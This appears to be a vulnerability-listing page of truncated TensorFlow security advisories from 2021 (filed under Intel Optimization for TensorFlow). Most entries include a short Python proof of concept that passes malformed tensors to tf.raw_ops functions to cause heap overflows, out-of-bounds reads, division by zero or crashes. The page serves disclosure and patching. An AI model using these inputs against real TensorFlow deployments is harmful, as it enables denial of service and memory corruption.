Intel Optimization For Tensorflow vulnerabilities

CVE-2021-29577 [LOW] CWE-119 Heap buffer overflow in `AvgPool3DGrad` Heap buffer overflow in `AvgPool3DGrad` ### Impact The implementation of `tf.raw_ops.AvgPool3DGrad` is vulnerable to a heap buffer overflow: ```python import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_inpu

CVE-2021-29558 [LOW] CWE-787 Heap buffer overflow in `SparseSplit` Heap buffer overflow in `SparseSplit` ### Impact An attacker can cause a heap buffer overflow in `tf.raw_ops.SparseSplit`: ```python import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1) ``` Th

CVE-2021-29576 [LOW] CWE-119 Heap buffer overflow in `MaxPool3DGradGrad` Heap buffer overflow in `MaxPool3DGradGrad` ### Impact The implementation of `tf.raw_ops.MaxPool3DGradGrad` is vulnerable to a heap buffer overflow: ```python import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ks

CVE-2021-29580 [LOW] CWE-908 Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad` Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad` ### Impact The implementation of `tf.raw_ops.FractionalMaxPoolGrad` triggers an undefined behavior if one of the input tensors is empty: ```python import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) ro

CVE-2021-29590 [LOW] CWE-125 Heap OOB read in TFLite's implementation of `Minimum` or `Maximum` Heap OOB read in TFLite's implementation of `Minimum` or `Maximum` ### Impact The implementations of the `Minimum` and `Maximum` TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty. This is because [the broadcasting implementation](https://github.com/tensorflow/tensorflow/blob/0d45ea1ca641b21b73bcf9c00e0179cda284e7

CVE-2021-29548 [LOW] CWE-369 Division by 0 in `QuantizedBatchNormWithGlobalNormalization` Division by 0 in `QuantizedBatchNormWithGlobalNormalization` ### Impact An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`: ```python import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([]

CVE-2021-29517 [LOW] CWE-369 Division by zero in `Conv3D` Division by zero in `Conv3D` ### Impact A malicious user could trigger a division by 0 in `Conv3D` implementation: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1

CVE-2021-29556 [LOW] CWE-369 Division by 0 in `Reverse` Division by 0 in `Reverse` ### Impact An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.Reverse`: ```python import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims) ``` This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/36229ea

CVE-2021-29544 [LOW] CWE-754 CHECK-fail in `QuantizeAndDequantizeV4Grad` CHECK-fail in `QuantizeAndDequantizeV4Grad` ### Impact An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.QuantizeAndDequantizeV4Grad`: ```python import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad(

CVE-2021-29536 [LOW] CWE-787 Heap buffer overflow in `QuantizedReshape` Heap buffer overflow in `QuantizedReshape` ### Impact An attacker can cause a heap buffer overflow in `QuantizedReshape` by passing in invalid thresholds for the quantization: ```python import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tenso

CVE-2021-29540 [LOW] CWE-120 Heap buffer overflow in `Conv2DBackpropFilter` Heap buffer overflow in `Conv2DBackpropFilter` ### Impact An attacker can cause a heap buffer overflow to occur in `Conv2DBackpropFilter`: ```python import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf

CVE-2021-29567 [LOW] CWE-617 Lack of validation in `SparseDenseCwiseMul` Lack of validation in `SparseDenseCwiseMul` ### Impact Due to lack of validation in `tf.raw_ops.SparseDenseCwiseMul`, an attacker can trigger denial of service via `CHECK`-fails or accesses to outside the bounds of heap allocated data: ```python import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=

CVE-2021-29552 [LOW] CWE-617 CHECK-failure in `UnsortedSegmentJoin` CHECK-failure in `UnsortedSegmentJoin` ### Impact An attacker can cause a denial of service by controlling the values of `num_segments` tensor argument for `UnsortedSegmentJoin`: ```python import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segmen

CVE-2021-29561 [LOW] CWE-617 CHECK-fail in `LoadAndRemapMatrix` CHECK-fail in `LoadAndRemapMatrix` ### Impact An attacker can cause a denial of service by exploiting a `CHECK`-failure coming from `tf.raw_ops.LoadAndRemapMatrix`: ```python import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.

CVE-2021-29543 [LOW] CWE-617 CHECK-fail in `CTCGreedyDecoder` CHECK-fail in `CTCGreedyDecoder` ### Impact An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.CTCGreedyDecoder`: ```python import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CVE-2021-29617 [LOW] CWE-755 Crash in `tf.strings.substr` due to `CHECK`-fail Crash in `tf.strings.substr` due to `CHECK`-fail ### Impact An attacker can cause a denial of service via `CHECK`-fail in `tf.strings.substr` with invalid arguments: ```python import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,-1]) ``` ```python import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,2]) ``` ### Patches We have received a patch for the issue in GitHub commit [890f7164

CVE-2021-29526 [LOW] CWE-369 Division by 0 in `Conv2D` Division by 0 in `Conv2D` ### Impact An attacker can trigger a division by 0 in `tf.raw_ops.Conv2D`: ```python import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding) ``` This is because the [implementation](https://github.com

CVE-2021-29519 [LOW] CWE-843 CHECK-fail in SparseCross due to type confusion CHECK-fail in SparseCross due to type confusion ### Impact The API of `tf.raw_ops.SparseCross` allows combinations which would result in a `CHECK`-failure and denial of service: ```python import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0

CVE-2021-29550 [LOW] CWE-369 Division by 0 in `FractionalAvgPool` Division by 0 in `FractionalAvgPool` ### Impact An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.FractionalAvgPool`: ```python import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=val

CVE-2021-29557 [LOW] CWE-369 Division by 0 in `SparseMatMul` Division by 0 in `SparseMatMul` ### Impact An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.SparseMatMul`: ```python import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) ``` The division by 0 oc